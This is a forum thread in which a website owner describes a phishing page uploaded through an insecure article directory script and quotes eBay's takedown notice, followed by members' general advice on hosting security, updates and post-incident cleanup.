An email you DON'T want to receive

24 replies
If you have an insecure php script on your web site you might just fall victim to a hacker that could get you into BIG TROUBLE with the feds. Such is the case that happened to one of my sites just recently.

I purchased an article directory script that (somehow) allowed the hacker to upload a phishing script to my server through the "upload photographs" feature. Fortunately, it was caught and removed within an hour of being uploaded (along with the script!), but not before I got this horrifying email from eBay (below). It is an email I don't want to receive again!

Here's the letter. I removed my site name (of course!).


Dear yoursite.com

We have just learned that your service is being used to display false, or "spoofed," PayPal.com pages, in an apparent effort to steal personal and financial information from consumers, and defraud PayPal users. Specifically, it appears that a yoursite.com user is sending unsolicited messages which misrepresent the sender as PayPal, and making false statements that encourage the recipient to go to a page hosted by you at

http://www.yoursite.com/Paypal/

yoursite.com

asking to enter personal and account information. The purloined information is then sent to an email account and, based on our investigation of similar schemes, used to steal accounts and commit other fraudulent acts including international credit card and wire fraud.

This matter is urgent - we believe that consumers have been falsely directed to this page and may be fooled into divulging personal information to a criminal, if the page is not immediately disabled. We ask that you immediately disable the site at http://www.yoursite.com/Paypal/, as well as any associated email addresses, so that this fraudulent scheme can be stopped. We further request that you provide us with all contact information that you have for this user so that we may provide this information to the proper law enforcement authorities.

While we believe that the above information gives your company more than a sufficient basis for disabling the page immediately, out of caution we note that your user's unauthorized reproduction of PayPal's trademark and copyrighted materials violates federal law, and places an independent legal obligation on your company to remove the offending page(s) immediately upon receiving notice from PayPal, the owner of the copyrighted materials. Accordingly, the information below serves as PayPal's notice of infringement pursuant to the Digital Millennium Copyright Act, 17 U.S.C. Section 512

(c)(3)(A):

I, the undersigned, CERTIFY UNDER PENALTY OF PERJURY that I am the agent authorized to act on behalf of the owner of certain intellectual property rights, said owner being named PayPal, Inc. I have a good faith belief that the website located at URL http://www.yoursite.com/Paypal/ has its copyright in each page of its website and associated source code. Please act expeditiously to remove or disable access to the material or items claimed to be infringing.

We sincerely appreciate your immediate attention to this important matter. We would also appreciate if you would take steps to confirm the accuracy of any contact information that your user may have provided to you in establishing the account. Should you have any accurate information that could assist PayPal and law enforcement in tracking this individual, we would greatly appreciate your assistance, as we know that you do not condone the use of your services for such criminal purposes.

Finally, please be advised that we have referred this issue to the Federal Bureau of Investigation for their investigation. The F.B.I. has requested that we convey to you in this message their request that you preserve for 90 days all records relating to this web site, including all associated accounts, computer logs, files, IP addresses, telephone numbers, subscriber and user records, communications, and all programs and files on storage media in regard to all Internet connection information, pursuant to 18 U.S.C. section 2703(f). While we do not act as an agent of the FBI in conveying this request, we do intend to fully cooperate with their investigation, and encourage you to do so as well.

eBay Inc.

Audit and Investigations

securityalerts@ebay.com

Get automated, real-time notifications of new phishing attacks! Join the Phish Report Network as a RECEIVER today! Phish Report Network: Fighting Online Fraud
It really pays to stay on top of your website security. I have 25 sites and I know what a pain it is - but it is absolutely necessary.

Also, don't just purchase any script from "just anybody" - check them out first. It's no fun to be hacked!

Linda
#email #receive
  • Profile picture of the author talfighel
    Good advice Linda. Security is a big thing online.

    Thanks,

    Tal
    {{ DiscussionBoard.errors[864121].message }}
    • Profile picture of the author bgmacaw
      That email looks suspiciously like a phishing scam I've seen before. It had links that at first glance looked legit but actually pointed to a phishing site on a .ru domain.
      {{ DiscussionBoard.errors[864172].message }}
      • Profile picture of the author Linda Van Fleet
        Originally Posted by bgmacaw View Post

        That email looks suspiciously like a phishing scam I've seen before. It had links that at first glance looked legit but actually pointed to a phishing site on a .ru domain.
        Well, this one came directly from eBay and was not a scam. The script had been installed on my server - I found it there myself and removed it.

        I also got a notice from my hosting provider. eBay had informed them of the phishing script that had been installed on my server. I have a dedicated server with Liquid Web and they're great. They didn't shut my site down because I had immediately removed the script. They put a scan on the server to see if it had been compromised in any other way even though I was the one who had installed the insecure article directory script.

        It pays to have a good hosting provider!
        {{ DiscussionBoard.errors[864194].message }}
  • Profile picture of the author Gene Pimentel
    Thanks for the reminder Linda. How did you remedy this (other than removing the phishing script)? Did you replace the php with something more secure? If so, how do you determine whether it's secure?
    {{ DiscussionBoard.errors[864217].message }}
    • Profile picture of the author Linda Van Fleet
      Originally Posted by Gene Pimentel View Post

      Thanks for the reminder Linda. How did you remedy this (other than removing the phishing script)? Did you replace the php with something more secure? If so, how do you determine whether it's secure?
      I removed the article directory.

      Hindsight. I had read somewhere that the article directory script I had installed had security leaks. The developer did put out an upgraded version - but there was still chatter that it was insecure.

      Of course, that could never happen to me, I reasoned. I have phpsuex installed and had also taken lots of other security measures. Stupidity in action! At any rate, when I saw the uploaded zip file I put 2 and 2 together and removed the entire script at about the same time I got the notice from eBay.

      I check my sites' files on a regular, on-going basis, looking for hacking activity. And, when using open source software (like WP and Joomla - two I use a lot) I make sure to update it every time a new version comes out. It is a hassle to be sure, but it is vital to online business.

      Linda
      {{ DiscussionBoard.errors[864365].message }}
  • Profile picture of the author TLTheLiberator
    A real life case study about how we all can't be careful enough with the security of our websites.

    Thanks for the reminder.

    TL
    Signature

    "It's easier to fool people than to convince them that they have been fooled. -- Mark Twain

    {{ DiscussionBoard.errors[864233].message }}
  • Profile picture of the author PeteHarrison
    Hi Linda,

    What is the article directory script that has this backdoor?

    Pete
    {{ DiscussionBoard.errors[864358].message }}
    • Profile picture of the author Linda Van Fleet
      Originally Posted by PeteHarrison View Post

      Hi Linda,

      What is the article directory script that has this backdoor?

      Pete
      Star Article Directory
      {{ DiscussionBoard.errors[864368].message }}
      • Profile picture of the author seasoned
        Originally Posted by Linda Van Fleet View Post

        Star Article Directory
        Actually, in theory, you COULD use the download option in almost ANY poorly written script, MOST ARE, to do this using a MAJOR security flaw built into UNIX that MANY programs, such as http, depend on. LUCKILY, PHP DOES have an option, I forget its name, and don't want to be TOO specific, that is to limit such an attack. It IS under the cpanel setup for HTTP though. ALSO, this is ANOTHER reason to use groups properly, and NEVER start http as root.

        And yeah, I have been too laxed in checking MY server. I am going to have to get back into that. I have had four attacks, over about 10 years...

        1. Using FTP, that I setup for someone else, for illegal distribution of movies.
        2. Two more using a webroot kit.
        3. Another using a STUPID hole in mail that should NEVER have been there EVER! Ironically, it isn't publicised much.

        BTW #2 used the SAME hole I bet they used with that directory. Right now, an attempt to use those programs would fail with a privilege violation, and I doubt they are smart enough to even figure out what is wrong. HECK, it hasn't reoccured for 8 or 9 years, so I guess I am right.

        Steve
        {{ DiscussionBoard.errors[865064].message }}
  • Profile picture of the author Just_Mel
    Thank you so much for posting this - I had a site hacked just a couple of weeks ago and man is it a pain in the rear!

    Luckily it wasn't this bad but it reinforced the fact that you're files are not as secure as you would think, and it isn't just the corporations that these jack$@~es go after!

    Mine was literally the first site I put up with a new hosting provider and it was hacked the day after it went live - YUK!

    Some people really need to get a life

    Wishing you the best of luck in the future,

    Mel
    Signature

    "I never saw a wild thing sorry for itself. A small bird will drop frozen dead from a bough without ever having felt sorry for itself." - D.H. Lawrence
    {{ DiscussionBoard.errors[864383].message }}
    • Profile picture of the author halfpoint
      It seems as though there are more and more threads about sites being hacked popping up here each week.

      As someone who has absolutely no idea how servers and the like work, I wouldn't have the slightest idea of what to do if this was to happen to me.

      What steps can we take to ensure that our files are as secure as they can be?

      Also, I have noticed that many of the people who post on here with hacked sites are generally using Wordpress. Are you less vulnerable if your site is just html?
      {{ DiscussionBoard.errors[864405].message }}
      • Profile picture of the author Linda Van Fleet
        Originally Posted by Pat Jackson View Post

        It seems as though there are more and more threads about sites being hacked popping up here each week.

        As someone who has absolutely no idea how servers and the like work, I wouldn't have the slightest idea of what to do if this was to happen to me.

        What steps can we take to ensure that our files are as secure as they can be?

        Also, I have noticed that many of the people who post on here with hacked sites are generally using Wordpress. Are you less vulnerable if your site is just html?
        Here's a link for tightening up security on WP: Hardening WordPress WordPress Codex

        I have been using WP for years and have never been hacked. However, a couple of my Joomla sites were hacked right after the Mambo/Joomla split.

        Any site - whether plain html based or php -- has vulnerabilities. Hackers are relentless, hammering at servers constantly trying to find a backdoor in the system. I had not clue about this when I was on a shared server but since I have a dedicated server I can tell you the log files are full people trying different passwords to gain access.

        But, you can't live in a dark hole of fear about it. It is a fact of life. Keeping your site updated with the most current releases is the least you should do. Also, the permissions as much as possible, meaning don't allow public read, write, execute on a file unless absolutely necessary.
        {{ DiscussionBoard.errors[864506].message }}
        • Profile picture of the author halfpoint
          Originally Posted by Linda Van Fleet View Post

          Here's a link for tightening up security on WP: Hardening WordPress WordPress Codex

          I have been using WP for years and have never been hacked. However, a couple of my Joomla sites were hacked right after the Mambo/Joomla split.

          Any site - whether plain html based or php -- has vulnerabilities. Hackers are relentless, hammering at servers constantly trying to find a backdoor in the system. I had not clue about this when I was on a shared server but since I have a dedicated server I can tell you the log files are full people trying different passwords to gain access.

          But, you can't live in a dark hole of fear about it. It is a fact of life. Keeping your site updated with the most current releases is the least you should do. Also, the permissions as much as possible, meaning don't allow public read, write, execute on a file unless absolutely necessary.
          Thanks for the link, Linda.

          Although I don't use Wordpress, I'll keep that page bookmarked incase I do down the track.

          It just seems to me that a majority of the people who post threads about being hacked are using Wordpress. My sites are static html pages that once created, I seldom change much at all.

          What other measures I should be taking?

          Feel free to chime in as well, James. I've noticed in other threads you're very knowledagble on this subject!
          {{ DiscussionBoard.errors[864616].message }}
          • Profile picture of the author TheRichJerksNet
            Originally Posted by Pat Jackson View Post

            Thanks for the link, Linda.

            Although I don't use Wordpress, I'll keep that page bookmarked incase I do down the track.

            It just seems to me that a majority of the people who post threads about being hacked are using Wordpress. My sites are static html pages that once created, I seldom change much at all.

            What other measures I should be taking?

            Feel free to chime in as well, James. I've noticed in other threads you're very knowledagble on this subject!
            See my post above Pat ...

            As for Static sites, again you want to make sure you have a secured host.. At the same time you want to make sure your computer system is clean. I use Best Anti-Virus Software & Internet Security - Kaspersky Lab on my Intel-Mac that runs windowsXP, it is really great software.. Cost a little bit but well worth it as I get no troubles on my WindowsXP system.

            I have always told clients to keep passwords and usernames the old fashion way .. On a sheet of "real" paper written down with a "real" pen, I do not keep any passwords on my system at all..

            James
            {{ DiscussionBoard.errors[864639].message }}
      • Profile picture of the author TheRichJerksNet
        Originally Posted by Pat Jackson View Post

        It seems as though there are more and more threads about sites being hacked popping up here each week.

        As someone who has absolutely no idea how servers and the like work, I wouldn't have the slightest idea of what to do if this was to happen to me.

        What steps can we take to ensure that our files are as secure as they can be?

        Also, I have noticed that many of the people who post on here with hacked sites are generally using Wordpress. Are you less vulnerable if your site is just html?
        Pat,
        This has been going on for years...

        The past five years has seen the popularity of blogs grow in their use and as a means of making money. That's the meat that computer hackers look to sink their teeth into. A recent report by the Congressional Research Service stated that the financial impact of computer hackers amounts to $226 billion annually. Another report calculated that hackers could be taking up to six cents of every Internet dollar of revenue.

        Fact is anything online is subject to hackers, warez users, scammer, and etc.. Nothing is ever going to change that. You can do many things to protect yourself though. As for wordpress I created the only real solution that hundreds of customers are happy with.

        James
        {{ DiscussionBoard.errors[864607].message }}
  • {{ DiscussionBoard.errors[864571].message }}
  • Profile picture of the author TheRichJerksNet
    This is why I always suggest getting a custom script built by a professional. Also getting proper hosting, the script may have not been coded with security (as many are not) but it is the host that allowed the permissions to be set for the hacker to execute the hacking files.

    One of the most secure systems for hosting that you can get is : Unix Server with Cpanel 11 with Php5+ and Apache Compiled with PhpSuexec

    Anything other than that and you are at higher risk.. If budget allows it is also best to go dedicated. I have lost entire sites with 10,000+ members due to host that was not secured, reason why I moved to hostgator and have not had a problem since.

    James
    {{ DiscussionBoard.errors[864591].message }}
    • Profile picture of the author Linda Van Fleet
      Originally Posted by TheRichJerksNet View Post

      ... it is the host that allowed the permissions to be set for the hacker to execute the hacking files.

      One of the most secure systems for hosting that you can get is : Unix Server with Cpanel 11 with Php5+ and Apache Compiled with PhpSuexec

      Anything other than that and you are at higher risk.. If budget allows it is also best to go dedicated. ....
      James
      That's exactly what I have, James, a dedicated Unix Server with Cpanel 11 with Php5+ and Apache Compiled with PhpSuexec .

      It can still happen -- did happen. It was my fault and I know it. But it was not because I didn't have the right server permissions; it was because I was using a script that has a security hole.

      You are absolutely correct in saying the best thing to do is have your own scripts built from scratch - but unfortunately, most people cannot afford to do that.
      {{ DiscussionBoard.errors[864704].message }}
      • Profile picture of the author TheRichJerksNet
        Originally Posted by Linda Van Fleet View Post

        That's exactly what I have, James, a dedicated Unix Server with Cpanel 11 with Php5+ and Apache Compiled with PhpSuexec .

        It can still happen -- did happen. It was my fault and I know it. But it was not because I didn't have the right server permissions; it was because I was using a script that has a security hole.

        You are absolutely correct in saying the best thing to do is have your own scripts built from scratch - but unfortunately, most people cannot afford to do that.
        If you need a custom built article directory I can supply you with one at a very reasonable price.. This is the exact reason why I am building a custom membership script right now because I understand people just can not afford those expensive solutions that offer very little unless you pay an arm and a leg and then give up your first born to have some plugins that may or may not be secured...

        James
        {{ DiscussionBoard.errors[864745].message }}
      • Profile picture of the author Floyd Fisher
        Originally Posted by Linda Van Fleet View Post

        That's exactly what I have, James, a dedicated Unix Server with Cpanel 11 with Php5+ and Apache Compiled with PhpSuexec .

        It can still happen -- did happen. It was my fault and I know it. But it was not because I didn't have the right server permissions; it was because I was using a script that has a security hole.

        You are absolutely correct in saying the best thing to do is have your own scripts built from scratch - but unfortunately, most people cannot afford to do that.
        Any script could have such a vulnerability it in. Don't beat yourself up over it, it's par for the course.

        Also, I highly doubt you're going to see any visits from the feds either. They usually don't move in unless $10,000 in damages can be proved.

        Do as they suggest (and I'd talk to a lawyer as well just in case), but don't fret too much over it.
        {{ DiscussionBoard.errors[865196].message }}
        • Profile picture of the author seasoned
          Originally Posted by Floyd Fisher View Post

          Any script could have such a vulnerability it in. Don't beat yourself up over it, it's par for the course.

          Also, I highly doubt you're going to see any visits from the feds either. They usually don't move in unless $10,000 in damages can be proved.

          Do as they suggest (and I'd talk to a lawyer as well just in case), but don't fret too much over it.
          Floyd is right! Just DISABLE the site ASAP! The best way is probably to take the base directory, set the mode to 700, and change the name. Try to access it with the new name, and it SHOULD fail. ALSO, backup as much of the server logs as you can, and try to get at least say 100 days there. It would be a good idea to then download that to a disk, and stash it away clearly marked. ONE MORE THING! Recreate a directory with the same name as the first originally had, and set IT 700! That MIGHT frustrate the hackers if they come back. And try to plug up the holes. You might be able to look at the logs and get an idea of their plan of attack. ALSO, check /etc/passwd to see if they created accounts, and get a rootkit hunter to see if they installed a rootkit.

          After all that is done, just check it every now and then. Even checking disk space, if you on a throttled account, or your own server, can be enough to determine if anyone likely did something.

          Steve
          {{ DiscussionBoard.errors[865284].message }}
          • Profile picture of the author Linda Van Fleet
            Originally Posted by seasoned View Post

            Floyd is right! Just DISABLE the site ASAP! The best way is probably to take the base directory, set the mode to 700, and change the name. Try to access it with the new name, and it SHOULD fail. ALSO, backup as much of the server logs as you can, and try to get at least say 100 days there. It would be a good idea to then download that to a disk, and stash it away clearly marked. ONE MORE THING! Recreate a directory with the same name as the first originally had, and set IT 700! That MIGHT frustrate the hackers if they come back. And try to plug up the holes. You might be able to look at the logs and get an idea of their plan of attack. ALSO, check /etc/passwd to see if they created accounts, and get a rootkit hunter to see if they installed a rootkit.

            After all that is done, just check it every now and then. Even checking disk space, if you on a throttled account, or your own server, can be enough to determine if anyone likely did something.

            Steve
            Thanks Guys. No worries, here - just wanted to share with the my fellow WF members so all will take more care with site security. As I posted earlier, I've already stopped the hacker on my site and have moved on down the road.

            Thanks for your input. It's great to have such a big, sharing community.

            Linda
            {{ DiscussionBoard.errors[865318].message }}
  • Profile picture of the author milan
    James, I thought you said don't advertise your stuff in the main forum and ask other people to do the same?

    Anyways, whether a script is custom made or not has nothing to do with security in place. Attackers are more likely to find you if you don't use a custom script. But, security flaws of those scripts are more quickly uncovered and fixed. That's because the whole community of users helps with the security. Once somebody gets attacked, more people help and there is a way to spread the news. With a custom script you're all alone. So, if a script is good and gets supported over time it usually gets secure enough. If you hear from other users about the security problems on and on - you know to move on. That's another privilege you don't have with a custom made script, you have to trust the programmer and that's it. And more eyes are better for security than a pair (who is also in a developer mindset, not in a hacker mindset).

    Basically, both ways have their pros and cons.
    {{ DiscussionBoard.errors[864952].message }}
    • Profile picture of the author Linda Van Fleet
      Originally Posted by milan View Post

      ... If you hear from other users about the security problems on and on - you know to move on.
      And don't ignore the warnings! So many people think "that's them" and "it could never happen to me" like I used to think. I'm pretty savvy but it was just plain stupid on my part to ignore what other folks were saying. I'm happy to say I got born again!

      Originally Posted by milan View Post

      That's another privilege you don't have with a custom made script, you have to trust the programmer ...
      Trust is a really big issue - even in a forum such as this one. But, I would think it's a lot safer in the WF to find a trusted programmer than in places like elance or getafreelancer. I've used both those services and I am nervous until the job is done.


      Originally Posted by milan View Post

      And more eyes are better for security than a pair (who is also in a developer mindset, not in a hacker mindset).
      That's why I love WP and Joomla. They are so fast to fix security holes.

      Linda
      {{ DiscussionBoard.errors[865002].message }}
  • Profile picture of the author Dinho7
    [DELETED]
    {{ DiscussionBoard.errors[10452564].message }}
    • Profile picture of the author discrat
      [DELETED]
      {{ DiscussionBoard.errors[10452570].message }}

Trending Topics